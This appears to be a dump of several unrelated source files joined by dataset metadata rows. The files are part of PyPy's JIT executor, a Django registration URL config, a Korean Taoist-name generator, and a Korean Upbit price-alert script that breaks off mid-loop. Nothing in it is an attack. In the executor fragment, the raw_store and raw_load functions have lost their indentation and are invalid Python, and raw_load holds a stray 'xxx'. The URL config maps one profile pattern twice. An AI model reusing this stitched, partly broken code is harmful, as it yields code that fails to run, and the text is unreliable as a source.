        return BoxPtr(cpu.bh_getinteriorfield_gc_r(array, index, descr))
    elif descr.is_float_field():
        return BoxFloat(cpu.bh_getinteriorfield_gc_f(array, index, descr))
    else:
        return BoxInt(cpu.bh_getinteriorfield_gc_i(array, index, descr))

def do_setinteriorfield_gc(cpu, _, arraybox, indexbox, valuebox, descr):
    # Write one field of an interior struct of a GC array, dispatched on the
    # field kind recorded in the descr.
    array = arraybox.getref_base()
    index = indexbox.getint()
    if descr.is_pointer_field():
        cpu.bh_setinteriorfield_gc_r(array, index, valuebox.getref_base(),
                                     descr)
    elif descr.is_float_field():
        cpu.bh_setinteriorfield_gc_f(array, index, valuebox.getfloatstorage(),
                                     descr)
    else:
        cpu.bh_setinteriorfield_gc_i(array, index, valuebox.getint(), descr)
# GETFIELD_GC_{I,R,F}: read a field of a GC struct.
def do_getfield_gc_i(cpu, _, structbox, fielddescr):
    struct = structbox.getref_base()
    return cpu.bh_getfield_gc_i(struct, fielddescr)

def do_getfield_gc_r(cpu, _, structbox, fielddescr):
    struct = structbox.getref_base()
    return cpu.bh_getfield_gc_r(struct, fielddescr)

def do_getfield_gc_f(cpu, _, structbox, fielddescr):
    struct = structbox.getref_base()
    return cpu.bh_getfield_gc_f(struct, fielddescr)

# GETFIELD_RAW_*: the struct is a raw address; check_descr() guards against
# a missing/invalid descriptor before dereferencing.
def do_getfield_raw_i(cpu, _, structbox, fielddescr):
    check_descr(fielddescr)
    struct = structbox.getint()
    return cpu.bh_getfield_raw_i(struct, fielddescr)

def do_getfield_raw_f(cpu, _, structbox, fielddescr):
    check_descr(fielddescr)
    struct = structbox.getint()
    return cpu.bh_getfield_raw_f(struct, fielddescr)

def do_getfield_raw_r(cpu, _, structbox, fielddescr):
    check_descr(fielddescr)
    struct = structbox.getint()
    return cpu.bh_getfield_raw_r(struct, fielddescr)

def do_setfield_gc(cpu, _, structbox, itembox, fielddescr):
    # Dispatch on the field kind recorded in the descr.
    struct = structbox.getref_base()
    if fielddescr.is_pointer_field():
        cpu.bh_setfield_gc_r(struct, itembox.getref_base(), fielddescr)
    elif fielddescr.is_float_field():
        cpu.bh_setfield_gc_f(struct, itembox.getfloatstorage(), fielddescr)
    else:
        cpu.bh_setfield_gc_i(struct, itembox.getint(), fielddescr)

def do_setfield_raw(cpu, _, structbox, itembox, fielddescr):
    struct = structbox.getint()
    # Raw structs can never hold GC pointers.
    assert not fielddescr.is_pointer_field()
    if fielddescr.is_float_field():
        cpu.bh_setfield_raw_f(struct, itembox.getfloatstorage(), fielddescr)
    else:
        cpu.bh_setfield_raw_i(struct, itembox.getint(), fielddescr)
def do_raw_store(cpu, _, addrbox, offsetbox, valuebox, arraydescr):
addr = addrbox.getint()
offset = offsetbox.getint()
if arraydescr.is_array_of_pointers():
raise AssertionError("cannot store GC pointers in raw store")
elif arraydescr.is_array_of_floats():
cpu.bh_raw_store_f(addr, offset, valuebox.getfloatstorage(),arraydescr)
else:
cpu.bh_raw_store_i(addr, offset, valuebox.getint(), arraydescr)
def do_raw_load(cpu, _, addrbox, offsetbox, arraydescr):
raise Exception("implement me")
xxx
addr = addrbox.getint()
offset = offsetbox.getint()
if arraydescr.is_array_of_pointers():
raise AssertionError("cannot store GC pointers in raw store")
elif arraydescr.is_array_of_floats():
return BoxFloat(cpu.bh_raw_load_f(addr, offset, arraydescr))
else:
return BoxInt(cpu.bh_raw_load_i(addr, offset, arraydescr))
def do_gc_store_indexed(cpu, _, addrbox, indexbox, valuebox, scalebox,
                        base_ofsbox, bytesbox, arraydescr):
    """Store 'valuebox' into a GC object at address index*scale+base_ofs,
    writing 'bytes' bytes.  Pointer stores are not supported here (they
    would need a GC write barrier)."""
    addr = addrbox.getref_base()
    index = indexbox.getint()
    scale = scalebox.getint()
    base_ofs = base_ofsbox.getint()
    bytes = bytesbox.getint()
    if arraydescr.is_array_of_pointers():
        raise AssertionError("cannot store GC pointers in gc_store_indexed for now")
    elif arraydescr.is_array_of_floats():
        floatval = valuebox.getfloatstorage()
        cpu.bh_gc_store_indexed_f(addr, index, floatval, scale, base_ofs, bytes,
                                  arraydescr)
    else:
        intval = valuebox.getint()
        cpu.bh_gc_store_indexed_i(addr, index, intval, scale, base_ofs, bytes,
                                  arraydescr)
def exec_new_with_vtable(cpu, descr):
    """Allocate a new instance whose vtable/size is described by 'descr'."""
    return cpu.bh_new_with_vtable(descr)
def do_new_with_vtable(cpu, _, clsbox):
    """Resop entry point for NEW_WITH_VTABLE; 'clsbox' is the descr itself."""
    return exec_new_with_vtable(cpu, clsbox)
def do_int_add_ovf(cpu, metainterp, box1, box2):
    """Overflow-checked integer addition.  On overflow, sets
    metainterp.ovf_flag (later tested by GUARD_NO_OVERFLOW/GUARD_OVERFLOW)
    and returns 0 as a dummy result."""
    # the overflow operations can be called without a metainterp, if an
    # overflow cannot occur
    a = box1.getint()
    b = box2.getint()
    try:
        z = ovfcheck(a + b)
    except OverflowError:
        assert metainterp is not None
        metainterp.ovf_flag = True
        z = 0
    return z
def do_int_sub_ovf(cpu, metainterp, box1, box2):
    """Overflow-checked integer subtraction; see do_int_add_ovf."""
    a = box1.getint()
    b = box2.getint()
    try:
        z = ovfcheck(a - b)
    except OverflowError:
        assert metainterp is not None
        metainterp.ovf_flag = True
        z = 0
    return z
def do_int_mul_ovf(cpu, metainterp, box1, box2):
    """Overflow-checked integer multiplication; see do_int_add_ovf."""
    a = box1.getint()
    b = box2.getint()
    try:
        z = ovfcheck(a * b)
    except OverflowError:
        assert metainterp is not None
        metainterp.ovf_flag = True
        z = 0
    return z
def do_same_as_i(cpu, _, v):
    """SAME_AS for ints: unwrap and return the boxed value unchanged."""
    return v.getint()
def do_same_as_r(cpu, _, v):
    """SAME_AS for GC references."""
    return v.getref_base()
def do_same_as_f(cpu, _, v):
    """SAME_AS for floats (as float storage)."""
    return v.getfloatstorage()
def do_copystrcontent(cpu, _, srcbox, dstbox,
                      srcstartbox, dststartbox, lengthbox):
    """Copy 'length' characters between two rstr.STR objects,
    from src[srcstart:] into dst[dststart:]."""
    src = srcbox.getref(lltype.Ptr(rstr.STR))
    dst = dstbox.getref(lltype.Ptr(rstr.STR))
    srcstart = srcstartbox.getint()
    dststart = dststartbox.getint()
    length = lengthbox.getint()
    rstr.copy_string_contents(src, dst, srcstart, dststart, length)
def do_copyunicodecontent(cpu, _, srcbox, dstbox,
                          srcstartbox, dststartbox, lengthbox):
    """Same as do_copystrcontent, but for rstr.UNICODE objects."""
    src = srcbox.getref(lltype.Ptr(rstr.UNICODE))
    dst = dstbox.getref(lltype.Ptr(rstr.UNICODE))
    srcstart = srcstartbox.getint()
    dststart = dststartbox.getint()
    length = lengthbox.getint()
    rstr.copy_unicode_contents(src, dst, srcstart, dststart, length)
def do_keepalive(cpu, _, x):
    """KEEPALIVE is a no-op at execution time; it only pins 'x' in traces."""
    pass
def do_assert_not_none(cpu, _, box):
    """Abort translation-level execution if 'box' holds a NULL reference."""
    if not box.getref_base():
        fatalerror("found during JITting: ll_assert_not_none() failed")
# ____________________________________________________________
def _make_execute_list():
    """Build the EXECUTE_BY_NUM_ARGS table: a dict keyed by
    (num_args, withdescr) whose values are lists indexed by opnum,
    giving the function that executes that resoperation (or None).

    For each opnum the executor is found, in order of preference, from:
    an explicit do_xxx() defined above, the same without the _PURE
    suffix, or a simple bhimpl_xxx() method of BlackholeInterpreter.
    Opcodes that pyjitpl never executes directly are explicitly
    whitelisted; anything else missing is a programming error."""
    execute_by_num_args = {}
    for key in opname.values():
        value = getattr(rop, key)
        if not key.startswith('_'):
            # FINAL and GUARD operations are handled specially, never here.
            if (rop._FINAL_FIRST <= value <= rop._FINAL_LAST or
                rop._GUARD_FIRST <= value <= rop._GUARD_LAST):
                continue
            # find which list to store the operation in, based on num_args
            num_args = resoperation.oparity[value]
            withdescr = resoperation.opwithdescr[value]
            dictkey = num_args, withdescr
            if dictkey not in execute_by_num_args:
                execute_by_num_args[dictkey] = [None] * (rop._LAST+1)
            execute = execute_by_num_args[dictkey]
            #
            if execute[value] is not None:
                raise AssertionError("duplicate entry for op number %d"% value)
            #
            # Fish for a way for the pyjitpl interpreter to delegate
            # really running the operation to the blackhole interpreter
            # or directly to the cpu.  First try the do_xxx() functions
            # explicitly encoded above:
            name = 'do_' + key.lower()
            if name in globals():
                execute[value] = globals()[name]
                continue
            #
            # Maybe the same without the _PURE suffix?
            if key[-7:-2] == '_PURE':
                key = key[:-7] + key[-2:]
                name = 'do_' + key.lower()
                if name in globals():
                    execute[value] = globals()[name]
                    continue
            #
            # If missing, fallback to the bhimpl_xxx() method of the
            # blackhole interpreter.  This only works if there is a
            # method of the exact same name and it accepts simple
            # parameters.
            name = 'bhimpl_' + key.lower()
            if hasattr(BlackholeInterpreter, name):
                func = make_execute_function(
                    key.lower(),
                    getattr(BlackholeInterpreter, name).im_func)
                if func is not None:
                    execute[value] = func
                    continue
            if value in (rop.FORCE_TOKEN,
                         rop.CALL_ASSEMBLER_R,
                         rop.CALL_ASSEMBLER_F,
                         rop.CALL_ASSEMBLER_I,
                         rop.CALL_ASSEMBLER_N,
                         rop.INCREMENT_DEBUG_COUNTER,
                         rop.COND_CALL_VALUE_R,
                         rop.COND_CALL_VALUE_I,
                         rop.COND_CALL_GC_WB,
                         rop.COND_CALL_GC_WB_ARRAY,
                         rop.ZERO_ARRAY,
                         rop.DEBUG_MERGE_POINT,
                         rop.JIT_DEBUG,
                         rop.ENTER_PORTAL_FRAME,
                         rop.LEAVE_PORTAL_FRAME,
                         rop.SETARRAYITEM_RAW,
                         rop.SETINTERIORFIELD_RAW,
                         rop.CALL_RELEASE_GIL_I,
                         rop.CALL_RELEASE_GIL_F,
                         rop.CALL_RELEASE_GIL_N,
                         rop.QUASIIMMUT_FIELD,
                         rop.CHECK_MEMORY_ERROR,
                         rop.CALL_MALLOC_NURSERY,
                         rop.CALL_MALLOC_NURSERY_VARSIZE,
                         rop.CALL_MALLOC_NURSERY_VARSIZE_FRAME,
                         rop.NURSERY_PTR_INCREMENT,
                         rop.LABEL,
                         rop.ESCAPE_I,
                         rop.ESCAPE_N,
                         rop.ESCAPE_R,
                         rop.ESCAPE_F,
                         rop.FORCE_SPILL,
                         rop.SAVE_EXC_CLASS,
                         rop.SAVE_EXCEPTION,
                         rop.RESTORE_EXCEPTION,
                         rop.VEC_LOAD_I,
                         rop.VEC_LOAD_F,
                         rop.GC_LOAD_I,
                         rop.GC_LOAD_R,
                         rop.GC_LOAD_F,
                         rop.GC_LOAD_INDEXED_R,
                         rop.VEC_STORE,
                         rop.GC_STORE,
                         rop.GC_STORE_INDEXED,
                         rop.LOAD_FROM_GC_TABLE,
                         rop.LOAD_EFFECTIVE_ADDRESS,
                         rop.RECORD_KNOWN_RESULT,
                         ):      # list of opcodes never executed by pyjitpl
                continue
            if rop._VEC_PURE_FIRST <= value <= rop._VEC_PURE_LAST:
                continue
            raise AssertionError("missing %r" % (key,))
    return execute_by_num_args
def make_execute_function(name, func):
    """Wrap a BlackholeInterpreter bhimpl_xxx function so it can be called
    with boxed arguments; returns None if the signature is unsupported."""
    # Make a wrapper for 'func'.  The func is a simple bhimpl_xxx function
    # from the BlackholeInterpreter class.  The wrapper is a new function
    # that receives boxed values (but returns a non-boxed value).
    for argtype in func.argtypes:
        if argtype not in ('i', 'r', 'f', 'd', 'cpu'):
            return None
    if list(func.argtypes).count('d') > 1:
        return None
    # unrolling_iterable lets RPython specialize the loop below per-func.
    argtypes = unrolling_iterable(func.argtypes)
    #
    def do(cpu, _, *argboxes):
        newargs = ()
        for argtype in argtypes:
            if argtype == 'cpu':
                value = cpu
            elif argtype == 'd':
                # The descr, when present, is always the last argument.
                value = argboxes[-1]
                assert isinstance(value, AbstractDescr)
                argboxes = argboxes[:-1]
            else:
                argbox = argboxes[0]
                argboxes = argboxes[1:]
                if argtype == 'i':   value = argbox.getint()
                elif argtype == 'r': value = argbox.getref_base()
                elif argtype == 'f': value = argbox.getfloatstorage()
            newargs = newargs + (value,)
        assert not argboxes
        #
        return func(*newargs)
    #
    do.__name__ = 'do_' + name
    return do
@specialize.memo()
def get_execute_funclist(num_args, withdescr):
    """Constant-foldable accessor for one EXECUTE_BY_NUM_ARGS list."""
    # workaround, similar to the next one
    return EXECUTE_BY_NUM_ARGS[num_args, withdescr]
@specialize.memo()
def get_execute_function(opnum, num_args, withdescr):
    """Constant-foldable lookup of the executor for one opnum."""
    # workaround for an annotation limitation: putting this code in
    # a specialize:memo function makes sure the following line is
    # constant-folded away.  Only works if opnum and num_args are
    # constants, of course.
    func = EXECUTE_BY_NUM_ARGS[num_args, withdescr][opnum]
    #assert func is not None, "EXECUTE_BY_NUM_ARGS[%s, %s][%s]" % (
    #    num_args, withdescr, resoperation.opname[opnum])
    return func
@specialize.memo()
def has_descr(opnum):
    """Constant-foldable: does this opnum carry a descr?"""
    # workaround, similar to the previous one
    return resoperation.opwithdescr[opnum]
@specialize.arg(2)
def execute(cpu, metainterp, opnum, descr, *argboxes):
    """Execute a fixed-arity resoperation 'opnum' on boxed arguments and
    return the unboxed result.  'descr', when required by the op, is
    appended to the argument tuple."""
    # only for opnums with a fixed arity
    num_args = len(argboxes)
    withdescr = has_descr(opnum)
    if withdescr:
        check_descr(descr)
        argboxes = argboxes + (descr,)
    else:
        assert descr is None
    func = get_execute_function(opnum, num_args, withdescr)
    return func(cpu, metainterp, *argboxes)  # note that the 'argboxes' tuple
                                             # optionally ends with the descr
@specialize.arg(2)
def execute_varargs(cpu, metainterp, opnum, argboxes, descr):
    """Execute a variable-arity resoperation (calls, typically); the
    arguments are passed as a list rather than unpacked."""
    # only for opnums with a variable arity (calls, typically)
    check_descr(descr)
    func = get_execute_function(opnum, -1, True)
    return func(cpu, metainterp, argboxes, descr)
@specialize.argtype(0)
def wrap_constant(value):
    """Box an unboxed low-level value into the matching Const* class
    (ConstInt / ConstFloat / ConstPtr), dispatching on its lltype."""
    if lltype.typeOf(value) == lltype.Signed:
        return ConstInt(value)
    elif isinstance(value, bool):
        return ConstInt(int(value))
    elif lltype.typeOf(value) == longlong.FLOATSTORAGE:
        return ConstFloat(value)
    elif isinstance(value, float):
        # plain float: convert to the canonical float-storage representation
        return ConstFloat(longlong.getfloatstorage(value))
    else:
        assert lltype.typeOf(value) == llmemory.GCREF
        return ConstPtr(value)
def constant_from_op(op):
    """Snapshot the current value of 'op' into a Const of the same type
    ('i' -> ConstInt, 'r' -> ConstPtr, 'f' -> ConstFloat)."""
    if op.type == 'i':
        return ConstInt(op.getint())
    elif op.type == 'r':
        return ConstPtr(op.getref_base())
    else:
        assert op.type == 'f'
        return ConstFloat(op.getfloatstorage())
# Unrolled at translation time so the opnum comparison below constant-folds.
unrolled_range = unrolling_iterable(range(rop._LAST))
def execute_nonspec_const(cpu, metainterp, opnum, argboxes, descr=None,
                          type='i'):
    """Execute 'opnum' (not known as a translation-time constant) and wrap
    the result in a Const.  The unrolled loop turns the runtime opnum into
    a constant for _execute_arglist's specialization."""
    for num in unrolled_range:
        if num == opnum:
            return wrap_constant(_execute_arglist(cpu, metainterp, num,
                                                  argboxes, descr))
    assert False
@specialize.arg(2)
def _execute_arglist(cpu, metainterp, opnum, argboxes, descr=None):
    """Execute 'opnum' with its arguments given as a list.  The explicit
    per-arity if-chain (rather than *args unpacking) is deliberate: with
    opnum constant, RPython constant-folds away every branch but one."""
    arity = resoperation.oparity[opnum]
    assert arity == -1 or len(argboxes) == arity
    if resoperation.opwithdescr[opnum]:
        check_descr(descr)
        if arity == -1:
            func = get_execute_function(opnum, -1, True)
            if func:
                return func(cpu, metainterp, argboxes, descr)
        if arity == 0:
            func = get_execute_function(opnum, 0, True)
            if func:
                return func(cpu, metainterp, descr)
        if arity == 1:
            func = get_execute_function(opnum, 1, True)
            if func:
                return func(cpu, metainterp, argboxes[0], descr)
        if arity == 2:
            func = get_execute_function(opnum, 2, True)
            if func:
                return func(cpu, metainterp, argboxes[0], argboxes[1], descr)
        if arity == 3:
            func = get_execute_function(opnum, 3, True)
            if func:
                return func(cpu, metainterp, argboxes[0], argboxes[1],
                            argboxes[2], descr)
    else:
        assert descr is None
        if arity == 1:
            func = get_execute_function(opnum, 1, False)
            if func:
                return func(cpu, metainterp, argboxes[0])
        if arity == 2:
            func = get_execute_function(opnum, 2, False)
            if func:
                return func(cpu, metainterp, argboxes[0], argboxes[1])
        if arity == 3:
            func = get_execute_function(opnum, 3, False)
            if func:
                return func(cpu, metainterp, argboxes[0], argboxes[1],
                            argboxes[2])
        if arity == 5:    # copystrcontent, copyunicodecontent
            func = get_execute_function(opnum, 5, False)
            if func:
                return func(cpu, metainterp, argboxes[0], argboxes[1],
                            argboxes[2], argboxes[3], argboxes[4])
    raise NotImplementedError
EXECUTE_BY_NUM_ARGS = _make_execute_list()
| mozillazg/pypy | rpython/jit/metainterp/executor.py | executor.py | py | 23,295 | python | en | code | 430 | github-code | 36 |
12085831934 | from django.urls import re_path, include
from registration import views
from django.contrib.auth import views as auth_views
# URL routes for the registration app (auth, signup, profiles, approval).
urlpatterns = [
    re_path(r'^login/$', auth_views.login, name='login'),
    # Redirect to the site root after logging out.
    re_path(r'^logout/$', auth_views.logout, {'next_page': '/'}, name='logout'),
    re_path(r'^signup/$', views.signup, name='signup'),
    re_path(r'^profile/(?P<pk>\d+)$', views.view_profile, name='view_profile'),
    # NOTE(review): identical regex and view as 'view_profile' above; the
    # name suggests this was meant to route to an edit view/URL — confirm.
    re_path(r'^profile/(?P<pk>\d+)$', views.view_profile, name='edit_profile'),
    # No trailing '$': matches any path beginning with 'approve'.
    re_path(r'^approve', views.approve_and_close, name='approve_and_close')
]
| rgeurgas/Sid | registration/urls.py | urls.py | py | 575 | python | en | code | 0 | github-code | 36 |
12868339424 | from typing import List
from name_genie.common import data_dao_stem, data_dao_male_suffix, data_dao_female_suffix, data_shared_dao, data_shared_thing, data_shared_adj, data_shared_number
from name_genie.util import to_str
import random
__all__ = ['get_daos']
# Pool of candidate stems: dao-specific plus the shared dao/thing/adjective/number lists.
stems = data_dao_stem + data_shared_dao + data_shared_thing + data_shared_adj + data_shared_number
# Combined male+female suffix pool, used when no gender is requested.
suffixes = data_dao_male_suffix + data_dao_female_suffix
def get_daos(count: int = 10,
             gender: int | None = None,
             stem: str | None = None,
             suffix: str | None = None) -> List[str]:
    """
    Generate Taoist-style names (dao hao).

    Generation scheme: (stem) + (suffix)
    :param count: number of names to generate
    :param gender: gender: 1 - male; 2 - female; None - either
    :param stem: fixed stem; randomly drawn per name when None
    :param suffix: fixed suffix; randomly drawn (gender-aware) per name when None
    :return: list of generated names
    """
    names: List[str] = []
    for i in range(count):
        # Work on per-iteration copies so a None argument is re-drawn each time.
        gender2 = gender
        stem2 = stem
        suffix2 = suffix
        if stem2 is None:
            stem2 = random.choice(stems)
        if suffix2 is None:
            if gender2 == 1:
                suffix2 = random.choice(data_dao_male_suffix)
            elif gender2 == 2:
                suffix2 = random.choice(data_dao_female_suffix)
            else:
                suffix2 = random.choice(suffixes)
        name = to_str(stem2) + to_str(suffix2)
        names.append(name)
    return names
if __name__ == '__main__':
    # Ad-hoc smoke test: print 10 random names.
    print(get_daos())
| name-genie/name-genie-python | name_genie/dao.py | dao.py | py | 1,399 | python | en | code | 0 | github-code | 36 |
8562919260 | import time
import threading
import json
import datetime
from collections import deque
import ctypes
import os
import UpbitWrapper
from playsound import playsound
ALARM_SWITCH = True
SOUND_SWITCH = True
def tdstr(td):
    """Render a datetime.timedelta as a human-readable Korean duration string.

    Omits zero components (days/hours/minutes); always prints at least the
    seconds part, and appends the fractional part when microseconds != 0.
    """
    days = ""
    hours = ""
    minutes = ""
    seconds = "0"
    ms = ""
    if td.days != 0:
        days = f"{td.days}일 "
    if td.seconds // 3600 != 0:
        hours = f"{td.seconds // 3600}시간 "
    if (td.seconds % 3600) // 60 != 0:
        minutes = f"{(td.seconds % 3600) // 60:0>2d}분 "
    if td.seconds % 60 != 0:
        seconds = f"{td.seconds % 60}"
    if td.microseconds != 0:
        # td.microseconds is an int in [0, 999999] and must be zero-padded
        # to 6 digits: 5000us is ".005000" seconds.  The previous
        # "{:1.0f}" formatting dropped leading zeros, so 5000us rendered
        # as ".5000" and read as half a second.
        ms = f".{td.microseconds:06d}"
    return days + hours + minutes + seconds + ms + "초"
class Ticker:
    """One market ticker sample: name, market cap, trade price, timestamp
    (seconds since epoch)."""
    def __init__(self, market_name, market_cap, price, timestamp):
        self.market_name = market_name
        self.market_cap = market_cap
        self.price = price
        self.timestamp = timestamp
class MarketMonitor:
    """Tracks one market's recent tickers (newest-first deque) and raises an
    Alarm when the price changed by more than 'change' within 'interval'
    seconds; after firing it stays silent for 'cooldown' seconds."""
    def __init__(self, change, market, interval, cooldown):
        self.market_code = market
        self.change = change          # signed threshold ratio, e.g. 0.05 = +5%
        self.interval = interval      # look-back window (seconds)
        self.cooldown = cooldown      # mute period after an alarm (seconds)
        self.container = deque()      # Tickers, kept sorted newest-first
        self.is_active = True         # False while in cooldown
        self.time_disabled = 0        # timestamp when the alarm last fired
    def state_report(self):
        # Debug dump of the monitor's internal state.
        print('---------------')
        print(f"is_active: {self.is_active}")
        print(f"ALARM_SWITCH: {ALARM_SWITCH}")
        print(f"num_item: {len(self.container)}")
        #for i in range(len(self.container)):
        #    print(f"price: {self.container[i].price} time: {self.container[i].timestamp}")
        print('---------------')
    def update_ticker(self, item):
        """Insert a new Ticker (deduplicated by timestamp) and return an
        Alarm if the threshold is crossed, else None."""
        # self.state_report()
        # print(f"newcomer: {item.timestamp}")
        # restore alarm if disabled
        if self.is_active == False:
            alarm_checked = False   # NOTE(review): assigned but never used
            timestamp_now = datetime.datetime.now().timestamp()
            if self.time_disabled + self.cooldown < timestamp_now:
                self.is_active = True
        # add an item, keeping the deque sorted by descending timestamp
        idx = 0
        if len(self.container) == 0:
            self.container.append(item)
            return None
        while idx < len(self.container) and \
            self.container[idx].timestamp >= item.timestamp:
            # print(f"<<comparing {self.container[idx].timestamp} and {item.timestamp}")
            if self.container[idx].timestamp == item.timestamp:
                return None   # duplicate sample: ignore
            idx += 1
        if idx == len(self.container):
            self.container.append(item)
        else:
            self.container.insert(idx, item)
        # determine the newest
        first = self.container.popleft()
        self.container.appendleft(first)
        # determine the last (oldest)
        last = self.container.pop()
        if last.timestamp + self.interval > first.timestamp:
            # window not yet filled: nothing to compare against
            self.container.append(last)
            return None
        # determine the last outranged: drop samples older than the window,
        # remembering the newest of the dropped ones as the comparison base
        outranged = last
        while last.timestamp + self.interval < item.timestamp and \
            last != item:
            outranged = last
            last = self.container.pop()
        self.container.append(last)
        true_interval = item.timestamp - outranged.timestamp
        true_change = (item.price - outranged.price) / item.price
        # if satisfies condition (same sign and larger magnitude than the
        # threshold) and not cooling down, send off an alarm
        if abs(true_change) > self.change and true_change * self.change > 0 and self.is_active:
            self.time_disabled = datetime.datetime.now().timestamp()
            self.is_active = False
            return Alarm(first.timestamp, self.market_code, first.market_name, 0, true_change, true_interval)
class Alarm:
    """A formatted alarm message: market, percent change over a period, and
    the time it was generated."""
    def __init__(self, time, market_code, market_name, market_cap, d_ratio, d_time):
        # text = market_code_to_kor[self.market_code] + "(" + self.market + "): "
        self.time = time   # unix timestamp of the triggering sample
        self.text = market_name + "(" + market_code + "): "
        self.text += "지난 " + tdstr(datetime.timedelta(seconds=d_time)) + " 동안"
        self.text += f"{d_ratio * 100:.3f}% 변화했습니다\n"
        # self.text += f"현재 시세는 {cur_price:.2f}, 현재 시간은 {datetime.datetime.fromtimestamp(time)} 입니다"
        self.text += f"현재 시간은 {datetime.datetime.fromtimestamp(time)} 입니다"
    def __str__(self):
        return self.text
class Criteria:
    """One alarm rule (ratio / window / cooldown) applied across all
    markets; lazily creates a MarketMonitor per market."""
    def __init__(self, cid, d_ratio, d_time, cooldown):
        self.cid = cid              # user-visible criteria id
        self.d_ratio = d_ratio      # threshold change ratio
        self.d_time = d_time        # look-back window (seconds)
        self.cooldown = cooldown    # per-market mute period (seconds)
        self.monitor_dict = {}      # market code -> MarketMonitor
    def add_monitor(self, new_market):
        """Create a monitor for a market not seen before."""
        new_monitor = MarketMonitor(self.d_ratio, new_market, self.d_time, self.cooldown)
        self.monitor_dict[new_market] = new_monitor
    def update_monitors(self, new_items):
        """Feed the latest tickers to every monitor; return raised Alarms."""
        alarms = []
        for market, item in new_items.items():
            if market not in self.monitor_dict.keys():
                self.add_monitor(market)
            ret = self.monitor_dict[market].update_ticker(item)
            if ret != None:
                alarms.append(ret)
        return alarms
class Monitor:
    """Top-level coordinator: polls Upbit tickers on a timer thread, feeds
    them to every Criteria, keeps a 24h message history, and pops native
    message boxes (plus a sound) for alarms.  Shared state is guarded by
    per-structure locks."""
    def __init__(self):
        self.criteria_id = 1                        # next id to hand out
        self.criteria = []                          # list of Criteria
        self.criteria_lock = threading.Lock()
        self.message = deque()                      # Alarms, newest-first
        self.message_lock = threading.Lock()
        self.alarm_window_num = 0                   # open message boxes
        self.alarm_window_lock = threading.Lock()
    def update_messages(self, new_messages):
        """Merge new alarms into the history (sorted by time) and drop
        entries older than 24 hours (86400 s) relative to the newest."""
        self.message_lock.acquire(blocking=True)
        for msg in new_messages:
            idx = 0
            while idx < len(self.message) and msg.time >= self.message[idx].time:
                idx += 1
            if idx == len(self.message):
                self.message.append(msg)
            else:
                self.message.insert(idx, msg)
        if len(self.message) < 1:
            self.message_lock.release()
            return
        first = self.message.popleft()
        self.message.appendleft(first)
        while len(self.message) > 0:
            last = self.message.pop()
            if last.time + 86400 > first.time:
                self.message.append(last)
                break
        self.message_lock.release()
    def alarm_thread_func(self, alarm):
        """Worker: play the sound and show a blocking message box; caps
        the number of simultaneously open boxes at 10."""
        if SOUND_SWITCH:
            playsound('./alarm.wav')
        if not ALARM_SWITCH or self.alarm_window_num > 10:
            return
        self.alarm_window_lock.acquire(blocking=True)
        self.alarm_window_num += 1
        self.alarm_window_lock.release()
        # Blocks until the user dismisses the Windows message box.
        ctypes.windll.user32.MessageBoxW(0, alarm.text, "알림", 0)
        self.alarm_window_lock.acquire(blocking=True)
        self.alarm_window_num -= 1
        self.alarm_window_lock.release()
    def send_alarm(self, alarm):
        # Fire-and-forget: one thread per alarm so polling never blocks.
        threading.Thread(target=Monitor.alarm_thread_func, args=(self, alarm)).start()
    def _monitor(self):
        """One polling pass: fetch all KRW tickers and run every criteria."""
        new_messages = []
        markets = UpbitWrapper.get_all_markets()
        if markets == None:
            return
        r_dict = UpbitWrapper.get_tickers(markets)
        if r_dict == None:
            return
        market_tickers = {}   # dict, key: market code
        for market in r_dict:
            if "KRW" not in market['market']:
                continue
            cur_price = market['trade_price']
            timestamp = market['timestamp'] / 1e3   # ms -> seconds
            item = Ticker(markets[market['market']], 0, cur_price, timestamp)
            market_tickers[market['market']] = item
        self.criteria_lock.acquire(blocking=True)
        for criterion in self.criteria:
            new_messages.extend(criterion.update_monitors(market_tickers))
        self.criteria_lock.release()
        self.update_messages(new_messages)
        for msg in new_messages:
            self.send_alarm(msg)
        return
    def _monitor_wrapper(self):
        # Re-arm a 50 ms timer after each pass (~20 polls/second max).
        self._monitor()
        threading.Timer(0.05, Monitor._monitor_wrapper, args=(self,)).start()
    def start(self):
        """Start the background polling loop."""
        threading.Thread(target=Monitor._monitor_wrapper, args=(self,)).start()
    def add_criteria(self, d_ratio, d_time, cooldown):
        """Register a new alarm rule; returns its id."""
        new_criteria = Criteria(self.criteria_id, d_ratio, d_time, cooldown)
        self.criteria_id += 1
        self.criteria_lock.acquire(blocking=True)
        self.criteria.append(new_criteria)
        self.criteria_lock.release()
        return self.criteria_id - 1
    def list_criteria(self):
        """Return a printable summary of all registered rules."""
        text = ""
        self.criteria_lock.acquire(blocking=True)
        for c in self.criteria:
            text += f"알람 ID: {c.cid} 변화율: {c.d_ratio * 100}% 시간 간격: {datetime.timedelta(seconds=c.d_time)} 알람 주기: {datetime.timedelta(seconds=c.cooldown)}"
        self.criteria_lock.release()
        return text
    def remove_criteria(self, cid):
        """Remove the rule with id 'cid'.  NOTE(review): returns True when
        found/removed and False otherwise — the CLI prints these the other
        way round; confirm intended convention."""
        i = 0
        self.criteria_lock.acquire(blocking=True)
        for i in range(len(self.criteria)):
            if self.criteria[i].cid == cid:
                self.criteria.pop(i)
                self.criteria_lock.release()
                return True
        self.criteria_lock.release()
        return False
    def list_messages(self):
        """Return the 24h alarm history as printable text."""
        text = ""
        self.message_lock.acquire(blocking=True)
        for item in self.message:
            text += "-----------------------------------------------\n"
            text += str(datetime.datetime.fromtimestamp(item.time)) + "\n"
            text += item.text + "\n"
        self.message_lock.release()
        return text
# Start the background polling loop, then greet the user on the console.
monitor = Monitor()
monitor.start()
print("===============================")
print("환영합니다! 도움말은 h를 입력하세요")
print("주의: 알람 메세지 박스는 최신이 아닐 수 있습니다")
print("주의: m을 입력해 메세지함을 사용하세요")
print("===============================")
while True:
print(">> ", end=' ')
user_input = input().lower()
if user_input == 'h':
help_text = "도움말은 h를 입력하세요\n \
알람 추가는 a를 입력하세요\n \
알람 목록 보기는 l을 입력하세요\n \
알람 삭제를 위해선 r <알람 ID>를 입력하세요 (예시: r 3)\n \
전체 알람 끄기/켜기는 d을 입력하세요\n \
알람 소리 끄기/켜기는 s을 입력하세요\n \
메세지함은 m을 입력하세요"
print(help_text)
if user_input == 'q':
os._exit(0)
if user_input[:1] == 'r':
cid = 0
while True:
try:
cid = int(user_input[1:])
except:
print("잘못 입력하셨습니다. 처음으로 돌아갑니다.")
continue
break
if monitor.remove_criteria(cid) == False:
print("알람을 성공적으로 삭제했습니다")
else:
print("대상 알람 ID를 찾을 수 없습니다")
if user_input == 'l':
text = monitor.list_criteria()
print(text)
if user_input == 'm':
print(monitor.list_messages())
if user_input == 'd':
